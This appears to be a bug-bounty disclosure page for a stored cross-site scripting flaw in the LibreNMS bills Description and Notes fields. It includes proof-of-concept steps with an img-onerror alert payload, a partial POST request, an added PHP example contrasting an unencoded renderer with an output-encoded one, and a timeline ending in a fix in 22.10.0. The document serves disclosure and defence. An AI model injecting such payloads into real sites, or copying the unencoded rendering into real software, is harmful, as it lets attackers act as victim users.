librenms bills Description & Notes Stored XSS in librenms/librenms


Reported on

Apr 12th 2022


Please enter a description of the vulnerability.

Proof of Concept

  1. Login
  2. Go to http://[librenms]/bills
  3. Click to Create Bill
  4. Add Description or Notes ["<img src=x onerror=alert(1);>"]

POST /bills/ HTTP/1.1
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7



It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
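The class of fix for the report above, shown as an added example that is not part of the original report and is not LibreNMS code or the project's actual patch: a bill row rendered with stored values concatenated as-is, next to the same row with output encoding applied, plus a regression check. The record, the field names `description` and `notes`, and all function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample record: a bill as stored after the PoC steps in the report.
// Field names are illustrative assumptions, not the LibreNMS schema.
$bill = [
    'description' => '<img src=x onerror=alert(1);>',
    'notes'       => 'Q2 transit "uplink" & peering',
];

// Hypothetical vulnerable renderer: stored values go into the HTML unencoded.
function render_bill_row_unsafe(array $bill): string
{
    return '<tr><td>' . $bill['description'] . '</td><td>' . $bill['notes'] . '</td></tr>';
}

// Encode at output time for HTML text and quoted-attribute contexts.
function e_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened renderer: every stored field is encoded before it reaches the page,
// including the copy placed in a quoted attribute.
function render_bill_row_safe(array $bill): string
{
    return sprintf(
        '<tr><td title="%1$s">%1$s</td><td>%2$s</td></tr>',
        e_html($bill['description']),
        e_html($bill['notes'])
    );
}

// Regression check: any '<' that does not open or close the template's own
// <tr>/<td> tags must have come from stored data.
function row_contains_stored_markup(string $html): bool
{
    return preg_match('/<(?!\/?(tr|td)\b)/i', $html) === 1;
}

$unsafe = render_bill_row_unsafe($bill);
$safe   = render_bill_row_safe($bill);

// The unsafe row must trip the check and the safe row must not.
if (!row_contains_stored_markup($unsafe) || row_contains_stored_markup($safe)) {
    throw new RuntimeException('output-encoding regression in bill rendering');
}
echo $safe, PHP_EOL;
```

Encoding is applied when the value is written into HTML rather than when it is stored, so records saved before a fix are rendered safely as well.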

We are processing your report and will contact the librenms team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a exists 2 years ago
dnr6419 modified the report 2 years ago
We have contacted a member of the librenms team and are waiting to hear back 2 years ago
We have sent a follow up to the librenms team. We will try again in 4 days. 2 years ago
We have sent a second follow up to the librenms team. We will try again in 7 days. 2 years ago
We have sent a third follow up to the librenms team. We will try again in 14 days. 2 years ago
Tony Murray validated this vulnerability a year ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit 43cb72 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago